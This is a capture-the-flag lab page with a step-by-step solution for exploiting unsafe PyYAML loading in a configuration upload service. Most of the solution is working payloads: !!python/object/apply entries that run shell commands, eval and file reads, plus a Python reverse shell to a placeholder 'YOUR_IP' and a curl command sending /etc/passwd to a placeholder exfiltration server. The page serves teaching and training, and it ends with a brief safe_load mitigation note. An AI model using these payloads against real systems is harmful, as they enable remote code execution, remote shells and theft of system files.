Avatar

Labs / YAML Bomb

  • Challenge
  • Released 26 Sep 2025

💣 Can you detonate a YAML bomb to compromise the configuration system?

This corporate configuration management system processes YAML files for application settings, but a dangerous implementation flaw creates a perfect storm for exploitation. 💣 YAML deserialization attacks are increasingly common in modern applications, especially those using configuration-as-code approaches. Many developers don't realize that YAML can execute arbitrary Python code during parsing, making it a powerful attack vector for system compromise! 🎯

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

💣 YAML Bomb - Complete Solution

Objective: Exploit YAML deserialization vulnerability in a configuration management system to achieve remote code execution and retrieve the system flag.
🔍 Step 1: Application Discovery

Access the configuration management portal and explore its functionality:

curl http:///

The application provides a YAML configuration upload and processing feature for managing application settings.

🔍 Step 2: YAML Processing Analysis

Examine the configuration upload functionality at /upload endpoint:

curl -X POST http:///upload -F "config=@test.yaml"

The application processes YAML files and displays parsed configuration data, indicating YAML deserialization.

🔍 Step 3: Unsafe YAML Loading Detection

Test for unsafe YAML loading by creating a basic YAML file with Python object references:

# Method 1: Use single quotes to avoid shell history expansion
echo 'test: !!python/object/apply:os.system ["echo vulnerable"]' > test.yaml

# Method 2: Use heredoc for complex YAML
cat > test.yaml << 'EOF'
test: !!python/object/apply:os.system
- ["echo vulnerable"]
EOF

# Upload and test
curl -X POST http:///upload -F "config=@test.yaml"

If the application executes the command, it confirms yaml.load() is being used instead of yaml.safe_load().

🔍 Step 4: Basic Code Execution Payload

Create a YAML payload that executes system commands:

!!python/object/apply:subprocess.check_output
- ['id']

This payload uses PyYAML's object instantiation to execute the id command and return output.

🔍 Step 5: Flag Location Discovery

Use YAML deserialization to explore the file system and locate the flag:

# Method 1: Check common flag locations
!!python/object/apply:subprocess.check_output
- ['ls', '-la', '/flag.txt']

# Method 2: Search for flag files with better patterns
!!python/object/apply:subprocess.getoutput
- 'find / -name "flag.txt" -o -name "*.flag" -o -name "flag" 2>/dev/null | head -10'

# Method 3: Check multiple common flag locations
!!python/object/apply:subprocess.getoutput
- 'ls -la /flag.txt /root/flag.txt /home/*/flag.txt /tmp/flag.txt 2>/dev/null'

This searches for files containing "flag" in their name across the filesystem.

🔍 Step 6: Flag Extraction

Create a YAML payload to read the flag file once located:

!!python/object/apply:subprocess.check_output
- ['cat', '/flag.txt']

The application processes the YAML and executes the cat command, returning the flag content.

🔍 Step 7: Alternative Payload Methods

Multiple approaches can be used for YAML deserialization attacks:

# Method 1: Using subprocess.getoutput (returns output)
!!python/object/apply:subprocess.getoutput
- 'cat /flag.txt'

# Method 2: Using eval
!!python/object/apply:eval
- 'open("/flag.txt").read()'

# Method 3: Using subprocess.check_output (alternative)
!!python/object/apply:subprocess.check_output
- ['cat', '/flag.txt']
🔍 Step 8: Complete Exploitation Workflow

Full exploitation process using curl and YAML payloads:

# Create malicious YAML file
cat > exploit.yaml << 'EOF'
config_name: "System Configuration"
settings:
database:
host: "localhost"
port: 5432
exploit: !!python/object/apply:subprocess.check_output
- ['cat', '/flag.txt']
EOF

# Upload and execute
curl -X POST http:///upload -F "config=@exploit.yaml"
🔍 Step 9: Advanced YAML Bomb Techniques

More sophisticated YAML deserialization payloads:

# Reverse shell payload
!!python/object/apply:os.system
- 'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])"'

# File exfiltration
!!python/object/apply:subprocess.check_output
- ['curl', '-X', 'POST', '-d', '@/etc/passwd', 'http://YOUR_SERVER/exfil']
🔍 Step 10: Verification and Flag Submission

Verify successful exploitation by confirming flag extraction:

# The flag should be returned in the application response
# Look for UUID format: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

The flag will be displayed in the configuration processing results as a UUID string.

🛡️ Security Implications

YAML deserialization vulnerabilities demonstrate the critical importance of using safe parsing methods (yaml.safe_load()) instead of unsafe ones (yaml.load()) when processing untrusted YAML data. This attack vector is particularly dangerous in configuration management systems and CI/CD pipelines.